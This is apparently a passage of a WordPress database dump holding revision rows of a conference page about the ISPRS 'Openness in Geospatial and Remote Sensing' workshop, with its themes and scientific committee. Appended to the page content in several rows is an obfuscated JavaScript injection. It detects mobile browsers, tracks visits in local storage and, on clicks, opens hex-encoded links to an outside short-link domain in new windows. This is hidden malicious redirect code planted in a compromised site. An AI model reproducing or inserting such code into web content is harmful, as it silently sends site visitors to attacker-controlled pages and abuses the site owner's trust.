_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:26:45','2023-01-01 19:26:45','',3497,'https://gsw2023.com/?p=3523',0,'revision','',0),
(3524,1,'2023-01-01 19:26:56','2023-01-01 19:26:56','<p>[vc_row][vc_column width=\"1/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\"><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II Openness in Geospatial Science and Remote Sensing. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission – Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:26:56','2023-01-01 19:26:56','',3497,'https://gsw2023.com/?p=3524',0,'revision','',0),
(3525,1,'2023-01-01 19:27:54','2023-01-01 19:27:54','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61, 63, 64, 65\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x